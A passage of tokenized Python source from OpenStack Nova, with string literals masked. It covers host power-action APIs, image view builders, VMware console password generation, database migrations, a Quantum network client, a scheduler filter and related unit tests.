<EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> try : <EOL> result = self . compute_api . host_power_action ( context , host = host , <EOL> action = action ) <EOL> except NotImplementedError as e : <EOL> raise webob . exc . HTTPBadRequest ( explanation = e . msg ) <EOL> return { "<STR_LIT:host>" : host , "<STR_LIT>" : result } <EOL> def startup ( self , req , id ) : <EOL> return self . _host_power_action ( req , host = id , action = "<STR_LIT>" ) <EOL> def shutdown ( self , req , id ) : <EOL> return self . _host_power_action ( req , host = id , action = "<STR_LIT>" ) <EOL> def reboot ( self , req , id ) : <EOL> return self . _host_power_action ( req , host = id , action = "<STR_LIT>" ) <EOL> class Hosts ( extensions . ExtensionDescriptor ) : <EOL> def get_name ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_alias ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_description ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_namespace ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_updated ( self ) : <EOL> return "<STR_LIT>" <EOL> @ admin_only . admin_only <EOL> def get_resources ( self ) : <EOL> resources = [ extensions . ResourceExtension ( '<STR_LIT>' , <EOL> HostController ( ) , collection_actions = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> member_actions = { "<STR_LIT>" : "<STR_LIT:GET>" , "<STR_LIT>" : "<STR_LIT:GET>" , <EOL> "<STR_LIT>" : "<STR_LIT:GET>" } ) ] <EOL> return resources </s>
<s> import os . path <EOL> from nova . api . openstack import common <EOL> class ViewBuilder ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , base_url , project_id = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> self . base_url = base_url <EOL> self . project_id = project_id <EOL> def _format_dates ( self , image ) : <EOL> """<STR_LIT>""" <EOL> for attr in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if image . get ( attr ) is not None : <EOL> image [ attr ] = image [ attr ] . strftime ( '<STR_LIT>' ) <EOL> def _format_status ( self , image ) : <EOL> """<STR_LIT>""" <EOL> status_mapping = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> try : <EOL> image [ '<STR_LIT:status>' ] = status_mapping [ image [ '<STR_LIT:status>' ] ] <EOL> except KeyError : <EOL> image [ '<STR_LIT:status>' ] = '<STR_LIT>' <EOL> def _build_server ( self , image , image_obj ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def generate_href ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( self . base_url , "<STR_LIT>" , str ( image_id ) ) <EOL> def build ( self , image_obj , detail = False ) : <EOL> """<STR_LIT>""" <EOL> self . _format_dates ( image_obj ) <EOL> if "<STR_LIT:status>" in image_obj : <EOL> self . _format_status ( image_obj ) <EOL> image = { <EOL> "<STR_LIT:id>" : image_obj . get ( "<STR_LIT:id>" ) , <EOL> "<STR_LIT:name>" : image_obj . get ( "<STR_LIT:name>" ) , <EOL> } <EOL> self . _build_server ( image , image_obj ) <EOL> self . _build_image_id ( image , image_obj ) <EOL> if detail : <EOL> image . update ( { <EOL> "<STR_LIT>" : image_obj . get ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : image_obj . get ( "<STR_LIT>" ) , <EOL> "<STR_LIT:status>" : image_obj . get ( "<STR_LIT:status>" ) , <EOL> } ) <EOL> if image [ "<STR_LIT:status>" ] . upper ( ) == "<STR_LIT>" : <EOL> image [ "<STR_LIT>" ] = <NUM_LIT:100> <EOL> else : <EOL> image [ "<STR_LIT>" ] = <NUM_LIT:0> <EOL> return image <EOL> class ViewBuilderV10 ( ViewBuilder ) : <EOL> """<STR_LIT>""" <EOL> def _build_server ( self , image , image_obj ) : <EOL> try : <EOL> image [ '<STR_LIT>' ] = int ( image_obj [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> except ( KeyError , ValueError ) : <EOL> pass <EOL> def _build_image_id ( self , image , image_obj ) : <EOL> try : <EOL> image [ '<STR_LIT:id>' ] = int ( image_obj [ '<STR_LIT:id>' ] ) <EOL> except ValueError : <EOL> pass <EOL> class ViewBuilderV11 ( ViewBuilder ) : <EOL> """<STR_LIT>""" <EOL> def _build_server ( self , image , image_obj ) : <EOL> try : <EOL> serverRef = image_obj [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> image [ '<STR_LIT>' ] = { <EOL> "<STR_LIT:id>" : common . get_id_from_href ( serverRef ) , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : serverRef , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : common . remove_version_from_href ( serverRef ) , <EOL> } , <EOL> ] <EOL> } <EOL> except KeyError : <EOL> return <EOL> def _build_image_id ( self , image , image_obj ) : <EOL> image [ '<STR_LIT:id>' ] = "<STR_LIT:%s>" % image_obj [ '<STR_LIT:id>' ] <EOL> def generate_href ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( self . base_url , self . project_id , <EOL> "<STR_LIT>" , str ( image_id ) ) <EOL> def build ( self , image_obj , detail = False ) : <EOL> """<STR_LIT>""" <EOL> image = ViewBuilder . build ( self , image_obj , detail ) <EOL> href = self . generate_href ( image_obj [ "<STR_LIT:id>" ] ) <EOL> bookmark = self . generate_bookmark ( image_obj [ "<STR_LIT:id>" ] ) <EOL> image [ "<STR_LIT>" ] = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : href , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : bookmark , <EOL> } , <EOL> ] <EOL> if detail : <EOL> image [ "<STR_LIT>" ] = image_obj . get ( "<STR_LIT>" , { } ) <EOL> return image <EOL> def generate_bookmark ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( common . remove_version_from_href ( self . base_url ) , <EOL> self . project_id , "<STR_LIT>" , str ( image_id ) ) </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> import json <EOL> from nova import exception <EOL> from nova import flags <EOL> from nova import log as logging <EOL> from nova . virt . vmwareapi import vim_util <EOL> FLAGS = flags . FLAGS <EOL> flags . DEFINE_integer ( '<STR_LIT>' , <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" ) <EOL> flags . DEFINE_integer ( '<STR_LIT>' , <EOL> <NUM_LIT:10> , <EOL> "<STR_LIT>" ) <EOL> class VMRCConsole ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( VMRCConsole , self ) . __init__ ( ) <EOL> @ property <EOL> def console_type ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_port ( self , context ) : <EOL> """<STR_LIT>""" <EOL> return FLAGS . console_vmrc_port <EOL> def setup_console ( self , context , console ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def teardown_console ( self , context , console ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def init_host ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def fix_pool_password ( self , password ) : <EOL> """<STR_LIT>""" <EOL> return password <EOL> def generate_password ( self , vim_session , pool , instance_name ) : <EOL> """<STR_LIT>""" <EOL> username , password = pool [ '<STR_LIT:username>' ] , pool [ '<STR_LIT:password>' ] <EOL> vms = vim_session . _call_method ( vim_util , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT:name>' , '<STR_LIT>' ] ) <EOL> vm_ds_path_name = None <EOL> vm_ref = None <EOL> for vm in vms : <EOL> vm_name = None <EOL> ds_path_name = None <EOL> for prop in vm . propSet : <EOL> if prop . name == '<STR_LIT:name>' : <EOL> vm_name = prop . val <EOL> elif prop . name == '<STR_LIT>' : <EOL> ds_path_name = prop . val <EOL> if vm_name == instance_name : <EOL> vm_ref = vm . obj <EOL> vm_ds_path_name = ds_path_name <EOL> break <EOL> if vm_ref is None : <EOL> raise exception . InstanceNotFound ( instance_id = instance_name ) <EOL> json_data = json . dumps ( { '<STR_LIT>' : vm_ds_path_name , <EOL> '<STR_LIT:username>' : username , <EOL> '<STR_LIT:password>' : password } ) <EOL> return base64 . b64encode ( json_data ) <EOL> def is_otp ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class VMRCSessionConsole ( VMRCConsole ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( VMRCSessionConsole , self ) . __init__ ( ) <EOL> @ property <EOL> def console_type ( self ) : <EOL> return '<STR_LIT>' <EOL> def generate_password ( self , vim_session , pool , instance_name ) : <EOL> """<STR_LIT>""" <EOL> vms = vim_session . _call_method ( vim_util , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> vm_ref = None <EOL> for vm in vms : <EOL> if vm . propSet [ <NUM_LIT:0> ] . val == instance_name : <EOL> vm_ref = vm . obj <EOL> if vm_ref is None : <EOL> raise exception . InstanceNotFound ( instance_id = instance_name ) <EOL> virtual_machine_ticket = vim_session . _call_method ( <EOL> vim_session . _get_vim ( ) , <EOL> '<STR_LIT>' , <EOL> vim_session . _get_vim ( ) . get_service_content ( ) . sessionManager ) <EOL> json_data = json . dumps ( { '<STR_LIT>' : str ( vm_ref . value ) , <EOL> '<STR_LIT:username>' : virtual_machine_ticket , <EOL> '<STR_LIT:password>' : virtual_machine_ticket } ) <EOL> return base64 . b64encode ( json_data ) <EOL> def is_otp ( self ) : <EOL> """<STR_LIT>""" <EOL> return True </s>
<s> from sqlalchemy import Column , Integer , MetaData , String , Table <EOL> from nova import log as logging <EOL> meta = MetaData ( ) <EOL> def upgrade ( migrate_engine ) : <EOL> meta . bind = migrate_engine <EOL> instances = Table ( '<STR_LIT>' , meta , autoload = True , <EOL> autoload_with = migrate_engine ) <EOL> types = { } <EOL> for instance in migrate_engine . execute ( instances . select ( ) ) : <EOL> if instance . instance_type_id is None : <EOL> types [ instance . id ] = None <EOL> continue <EOL> try : <EOL> types [ instance . id ] = int ( instance . instance_type_id ) <EOL> except ValueError : <EOL> logging . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( instance . id , instance . instance_type_id ) ) <EOL> types [ instance . id ] = None <EOL> integer_column = Column ( '<STR_LIT>' , Integer ( ) , nullable = True ) <EOL> string_column = instances . c . instance_type_id <EOL> integer_column . create ( instances ) <EOL> for instance_id , instance_type_id in types . iteritems ( ) : <EOL> update = instances . update ( ) . where ( instances . c . id == instance_id ) . values ( instance_type_id_int = instance_type_id ) <EOL> migrate_engine . execute ( update ) <EOL> string_column . alter ( name = '<STR_LIT>' ) <EOL> integer_column . alter ( name = '<STR_LIT>' ) <EOL> string_column . drop ( ) <EOL> def downgrade ( migrate_engine ) : <EOL> meta . bind = migrate_engine <EOL> instances = Table ( '<STR_LIT>' , meta , autoload = True , <EOL> autoload_with = migrate_engine ) <EOL> integer_column = instances . c . instance_type_id <EOL> string_column = Column ( '<STR_LIT>' , <EOL> String ( length = <NUM_LIT:255> , convert_unicode = False , <EOL> assert_unicode = None , unicode_error = None , <EOL> _warn_on_bytestring = False ) , <EOL> nullable = True ) <EOL> types = { } <EOL> for instance in migrate_engine . execute ( instances . select ( ) ) : <EOL> if instance . instance_type_id is None : <EOL> types [ instance . id ] = None <EOL> else : <EOL> types [ instance . id ] = str ( instance . instance_type_id ) <EOL> string_column . create ( instances ) <EOL> for instance_id , instance_type_id in types . iteritems ( ) : <EOL> update = instances . update ( ) . where ( instances . c . id == instance_id ) . values ( instance_type_id_str = instance_type_id ) <EOL> migrate_engine . execute ( update ) <EOL> integer_column . alter ( name = '<STR_LIT>' ) <EOL> string_column . alter ( name = '<STR_LIT>' ) <EOL> integer_column . drop ( ) </s>
<s> import sqlalchemy <EOL> from sqlalchemy import MetaData , Table , Column , String <EOL> from nova . compute import task_states <EOL> from nova . compute import vm_states <EOL> meta = MetaData ( ) <EOL> c_task_state = Column ( '<STR_LIT>' , <EOL> String ( length = <NUM_LIT:255> , convert_unicode = False , <EOL> assert_unicode = None , unicode_error = None , <EOL> _warn_on_bytestring = False ) , <EOL> nullable = True ) <EOL> _upgrade_translations = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . ACTIVE , <EOL> "<STR_LIT>" : task_states . STOPPING , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . STOPPED , <EOL> "<STR_LIT>" : None , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . DELETED , <EOL> "<STR_LIT>" : None , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . ACTIVE , <EOL> "<STR_LIT>" : task_states . DELETING , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . ACTIVE , <EOL> "<STR_LIT>" : None , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . BUILDING , <EOL> "<STR_LIT>" : task_states . SCHEDULING , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . MIGRATING , <EOL> "<STR_LIT>" : None , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . BUILDING , <EOL> "<STR_LIT>" : task_states . SCHEDULING , <EOL> } , <EOL> } <EOL> _downgrade_translations = { <EOL> vm_states . ACTIVE : { <EOL> None : "<STR_LIT>" , <EOL> task_states . DELETING : "<STR_LIT>" , <EOL> task_states . STOPPING : "<STR_LIT>" , <EOL> } , <EOL> vm_states . BUILDING : { <EOL> None : "<STR_LIT>" , <EOL> task_states . SCHEDULING : "<STR_LIT>" , <EOL> } , <EOL> vm_states . STOPPED : { <EOL> None : "<STR_LIT>" , <EOL> } , <EOL> vm_states . REBUILDING : { <EOL> None : "<STR_LIT>" , <EOL> } , <EOL> vm_states . DELETED : { <EOL> None : "<STR_LIT>" , <EOL> } , <EOL> vm_states . MIGRATING : { <EOL> None : "<STR_LIT>" , <EOL> } , <EOL> } <EOL> def upgrade ( migrate_engine ) : <EOL> meta . bind = migrate_engine <EOL> instance_table = Table ( '<STR_LIT>' , meta , autoload = True , <EOL> autoload_with = migrate_engine ) <EOL> c_state = instance_table . c . state <EOL> c_state . alter ( name = '<STR_LIT>' ) <EOL> c_vm_state = instance_table . c . state_description <EOL> c_vm_state . alter ( name = '<STR_LIT>' ) <EOL> instance_table . create_column ( c_task_state ) <EOL> for old_state , values in _upgrade_translations . iteritems ( ) : <EOL> instance_table . update ( ) . values ( ** values ) . where ( c_vm_state == old_state ) . execute ( ) <EOL> def downgrade ( migrate_engine ) : <EOL> meta . bind = migrate_engine <EOL> instance_table = Table ( '<STR_LIT>' , meta , autoload = True , <EOL> autoload_with = migrate_engine ) <EOL> c_task_state = instance_table . c . task_state <EOL> c_state = instance_table . c . power_state <EOL> c_state . alter ( name = '<STR_LIT:state>' ) <EOL> c_vm_state = instance_table . c . vm_state <EOL> c_vm_state . alter ( name = '<STR_LIT>' ) <EOL> for old_vm_state , old_task_states in _downgrade_translations . iteritems ( ) : <EOL> for old_task_state , new_state_desc in old_task_states . iteritems ( ) : <EOL> instance_table . update ( ) . where ( c_task_state == old_task_state ) . where ( c_vm_state == old_vm_state ) . values ( vm_state = new_state_desc ) . execute ( ) <EOL> instance_table . drop_column ( '<STR_LIT>' ) </s>
<s> import httplib <EOL> import json <EOL> import socket <EOL> import urllib <EOL> class JSONSerializer ( object ) : <EOL> """<STR_LIT>""" <EOL> def serialize ( self , data , content_type ) : <EOL> try : <EOL> return json . dumps ( data ) <EOL> except TypeError : <EOL> pass <EOL> return json . dumps ( to_primitive ( data ) ) <EOL> def deserialize ( self , data , content_type ) : <EOL> return json . loads ( data ) <EOL> class QuantumNotFoundException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class QuantumServerException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class QuantumIOException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class api_call ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , func ) : <EOL> self . func = func <EOL> def __get__ ( self , instance , owner ) : <EOL> def with_params ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> ( format , tenant ) = ( instance . format , instance . tenant ) <EOL> if '<STR_LIT>' in kwargs : <EOL> instance . format = kwargs [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in kwargs : <EOL> instance . tenant = kwargs [ '<STR_LIT>' ] <EOL> ret = None <EOL> try : <EOL> ret = self . func ( instance , * args ) <EOL> finally : <EOL> ( instance . format , instance . tenant ) = ( format , tenant ) <EOL> return ret <EOL> return with_params <EOL> class Client ( object ) : <EOL> """<STR_LIT>""" <EOL> action_prefix = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> networks_path = "<STR_LIT>" <EOL> network_path = "<STR_LIT>" <EOL> ports_path = "<STR_LIT>" <EOL> port_path = "<STR_LIT>" <EOL> attachment_path = "<STR_LIT>" <EOL> def __init__ ( self , host = "<STR_LIT:127.0.0.1>" , port = <NUM_LIT> , use_ssl = False , tenant = None , <EOL> format = "<STR_LIT>" , testing_stub = None , key_file = None , <EOL> cert_file = None , logger = None ) : <EOL> """<STR_LIT>""" <EOL> self . host = host <EOL> self . port = port <EOL> self . use_ssl = use_ssl <EOL> self . tenant = tenant <EOL> self . format = format <EOL> self . connection = None <EOL> self . testing_stub = testing_stub <EOL> self . key_file = key_file <EOL> self . cert_file = cert_file <EOL> self . logger = logger <EOL> def get_connection_type ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . testing_stub : <EOL> return self . testing_stub <EOL> elif self . use_ssl : <EOL> return httplib . HTTPSConnection <EOL> else : <EOL> return httplib . HTTPConnection <EOL> def do_request ( self , method , action , body = None , <EOL> headers = None , params = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . tenant : <EOL> raise Exception ( _ ( "<STR_LIT>" ) ) <EOL> action += "<STR_LIT>" % self . format <EOL> action = Client . action_prefix + action <EOL> action = action . replace ( '<STR_LIT>' , self . tenant ) <EOL> if type ( params ) is dict : <EOL> action += '<STR_LIT:?>' + urllib . urlencode ( params ) <EOL> try : <EOL> connection_type = self . get_connection_type ( ) <EOL> headers = headers or { "<STR_LIT:Content-Type>" : <EOL> "<STR_LIT>" % self . format } <EOL> certs = { '<STR_LIT>' : self . key_file , '<STR_LIT>' : self . cert_file } <EOL> certs = dict ( ( x , certs [ x ] ) for x in certs if certs [ x ] != None ) <EOL> if self . use_ssl and len ( certs ) : <EOL> c = connection_type ( self . host , self . port , ** certs ) <EOL> else : <EOL> c = connection_type ( self . host , self . port ) <EOL> if self . logger : <EOL> self . logger . debug ( <EOL> _ ( "<STR_LIT>" % <EOL> locals ( ) ) ) <EOL> if body : <EOL> self . logger . debug ( body ) <EOL> c . request ( method , action , body , headers ) <EOL> res = c . getresponse ( ) <EOL> status_code = self . get_status_code ( res ) <EOL> data = res . read ( ) <EOL> if self . logger : <EOL> self . logger . debug ( "<STR_LIT>" % ( str ( status_code ) , data ) ) <EOL> if status_code == httplib . NOT_FOUND : <EOL> raise QuantumNotFoundException ( <EOL> _ ( "<STR_LIT>" % data ) ) <EOL> if status_code in ( httplib . OK , <EOL> httplib . CREATED , <EOL> httplib . ACCEPTED , <EOL> httplib . NO_CONTENT ) : <EOL> if data is not None and len ( data ) : <EOL> return self . deserialize ( data , status_code ) <EOL> else : <EOL> raise QuantumServerException ( <EOL> _ ( "<STR_LIT>" <EOL> % locals ( ) ) ) <EOL> except ( socket . error , IOError ) , e : <EOL> raise QuantumIOException ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" % e ) ) <EOL> def get_status_code ( self , response ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( response , '<STR_LIT>' ) : <EOL> return response . status_int <EOL> else : <EOL> return response . status <EOL> def serialize ( self , data ) : <EOL> if not data : <EOL> return None <EOL> elif type ( data ) is dict : <EOL> return JSONSerializer ( ) . serialize ( data , self . content_type ( ) ) <EOL> else : <EOL> raise Exception ( _ ( "<STR_LIT>" % <EOL> type ( data ) ) ) <EOL> def deserialize ( self , data , status_code ) : <EOL> if status_code == <NUM_LIT> : <EOL> return data <EOL> return JSONSerializer ( ) . deserialize ( data , self . content_type ( ) ) <EOL> def content_type ( self , format = None ) : <EOL> if not format : <EOL> format = self . format <EOL> return "<STR_LIT>" % ( format ) <EOL> @ api_call <EOL> def list_networks ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . networks_path ) <EOL> @ api_call <EOL> def show_network_details ( self , network ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . network_path % ( network ) ) <EOL> @ api_call <EOL> def create_network ( self , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT:POST>" , self . networks_path , body = body ) <EOL> @ api_call <EOL> def update_network ( self , network , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT>" , self . network_path % ( network ) , body = body ) <EOL> @ api_call <EOL> def delete_network ( self , network ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT>" , self . network_path % ( network ) ) <EOL> @ api_call <EOL> def list_ports ( self , network ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . ports_path % ( network ) ) <EOL> @ api_call <EOL> def show_port_details ( self , network , port ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . port_path % ( network , port ) ) <EOL> @ api_call <EOL> def create_port ( self , network , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT:POST>" , self . ports_path % ( network ) , body = body ) <EOL> @ api_call <EOL> def delete_port ( self , network , port ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT>" , self . port_path % ( network , port ) ) <EOL> @ api_call <EOL> def set_port_state ( self , network , port , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT>" , <EOL> self . port_path % ( network , port ) , body = body ) <EOL> @ api_call <EOL> def show_port_attachment ( self , network , port ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . attachment_path % ( network , port ) ) <EOL> @ api_call <EOL> def attach_resource ( self , network , port , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT>" , <EOL> self . attachment_path % ( network , port ) , body = body ) <EOL> @ api_call <EOL> def detach_resource ( self , network , port ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT>" , <EOL> self . attachment_path % ( network , port ) ) </s>
<s> import nova . scheduler <EOL> from nova . scheduler . filters import abstract_filter <EOL> class AllHostsFilter ( abstract_filter . AbstractHostFilter ) : <EOL> """<STR_LIT>""" <EOL> def instance_type_to_filter ( self , instance_type ) : <EOL> """<STR_LIT>""" <EOL> return ( self . _full_name ( ) , instance_type ) <EOL> def filter_hosts ( self , zone_manager , query ) : <EOL> """<STR_LIT>""" <EOL> return [ ( host , services ) <EOL> for host , services in zone_manager . service_states . iteritems ( ) ] </s>
<s> import datetime <EOL> import json <EOL> import webob <EOL> import nova <EOL> from nova import context <EOL> from nova import test <EOL> from nova . api . openstack . contrib . volumes import BootFromVolumeController <EOL> from nova . compute import instance_types <EOL> from nova . tests . api . openstack import fakes <EOL> from nova . tests . api . openstack . test_servers import fake_gen_uuid <EOL> def fake_compute_api_create ( cls , context , instance_type , image_href , ** kwargs ) : <EOL> inst_type = instance_types . get_instance_type_by_flavor_id ( <NUM_LIT:2> ) <EOL> return [ { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fake_gen_uuid ( ) , <EOL> '<STR_LIT>' : dict ( inst_type ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:11> , <NUM_LIT:11> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> } ] <EOL> class BootFromVolumeTest ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( BootFromVolumeTest , self ) . setUp ( ) <EOL> self . stubs . Set ( nova . compute . API , '<STR_LIT>' , fake_compute_api_create ) <EOL> def test_create_root_volume ( self ) : <EOL> body = dict ( server = dict ( <EOL> name = '<STR_LIT>' , imageRef = <NUM_LIT:3> , <EOL> flavorRef = <NUM_LIT:2> , min_count = <NUM_LIT:1> , max_count = <NUM_LIT:1> , <EOL> block_device_mapping = [ dict ( <EOL> volume_id = <NUM_LIT:1> , <EOL> device_name = '<STR_LIT>' , <EOL> virtual = '<STR_LIT:root>' , <EOL> delete_on_termination = False , <EOL> ) ] <EOL> ) ) <EOL> req = webob . Request . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT:POST>' <EOL> req . body = json . dumps ( body ) <EOL> req . headers [ '<STR_LIT>' ] = '<STR_LIT:application/json>' <EOL> res = req . get_response ( fakes . wsgi_app ( ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> server = json . loads ( res . body ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( <NUM_LIT:1> , server [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , int ( server [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( u'<STR_LIT>' , server [ '<STR_LIT:name>' ] ) <EOL> self . assertEqual ( <NUM_LIT:3> , int ( server [ '<STR_LIT:image>' ] [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( <NUM_LIT:16> , len ( server [ '<STR_LIT>' ] ) ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> from nova import test <EOL> from nova . scheduler import least_cost <EOL> from nova . tests . scheduler import test_abstract_scheduler <EOL> MB = <NUM_LIT> * <NUM_LIT> <EOL> class FakeHost ( object ) : <EOL> def __init__ ( self , host_id , free_ram , io ) : <EOL> self . id = host_id <EOL> self . free_ram = free_ram <EOL> self . io = io <EOL> class WeightedSumTestCase ( test . TestCase ) : <EOL> def test_empty_domain ( self ) : <EOL> domain = [ ] <EOL> weighted_fns = [ ] <EOL> result = least_cost . weighted_sum ( domain , weighted_fns ) <EOL> expected = [ ] <EOL> self . assertEqual ( expected , result ) <EOL> def test_basic_costing ( self ) : <EOL> hosts = [ <EOL> FakeHost ( <NUM_LIT:1> , <NUM_LIT> * MB , <NUM_LIT:100> ) , <EOL> FakeHost ( <NUM_LIT:2> , <NUM_LIT> * MB , <NUM_LIT> ) , <EOL> FakeHost ( <NUM_LIT:3> , <NUM_LIT> * MB , <NUM_LIT:100> ) , <EOL> ] <EOL> weighted_fns = [ <EOL> ( <NUM_LIT:1> , lambda h : h . free_ram ) , <EOL> ( <NUM_LIT:2> , lambda h : h . io ) , <EOL> ] <EOL> costs = least_cost . weighted_sum ( <EOL> domain = hosts , weighted_fns = weighted_fns ) <EOL> expected = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> self . assertEqual ( expected , costs ) <EOL> class LeastCostSchedulerTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( LeastCostSchedulerTestCase , self ) . setUp ( ) <EOL> class FakeZoneManager : <EOL> pass <EOL> zone_manager = FakeZoneManager ( ) <EOL> states = test_abstract_scheduler . fake_zone_manager_service_states ( <EOL> num_hosts = <NUM_LIT:10> ) <EOL> zone_manager . service_states = states <EOL> self . sched = least_cost . LeastCostScheduler ( ) <EOL> self . sched . zone_manager = zone_manager <EOL> def tearDown ( self ) : <EOL> super ( LeastCostSchedulerTestCase , self ) . tearDown ( ) <EOL> def assertWeights ( self , expected , num , request_spec , hosts ) : <EOL> weighted = self . sched . weigh_hosts ( "<STR_LIT>" , request_spec , hosts ) <EOL> self . assertDictListMatch ( weighted , expected , approx_equal = True ) <EOL> def test_no_hosts ( self ) : <EOL> num = <NUM_LIT:1> <EOL> request_spec = { } <EOL> hosts = [ ] <EOL> expected = [ ] <EOL> self . assertWeights ( expected , num , request_spec , hosts ) <EOL> def test_noop_cost_fn ( self ) : <EOL> self . flags ( least_cost_scheduler_cost_functions = [ <EOL> '<STR_LIT>' ] , <EOL> noop_cost_fn_weight = <NUM_LIT:1> ) <EOL> num = <NUM_LIT:1> <EOL> request_spec = { } <EOL> hosts = self . sched . filter_hosts ( num , request_spec ) <EOL> expected = [ dict ( weight = <NUM_LIT:1> , hostname = hostname ) <EOL> for hostname , caps in hosts ] <EOL> self . assertWeights ( expected , num , request_spec , hosts ) <EOL> def 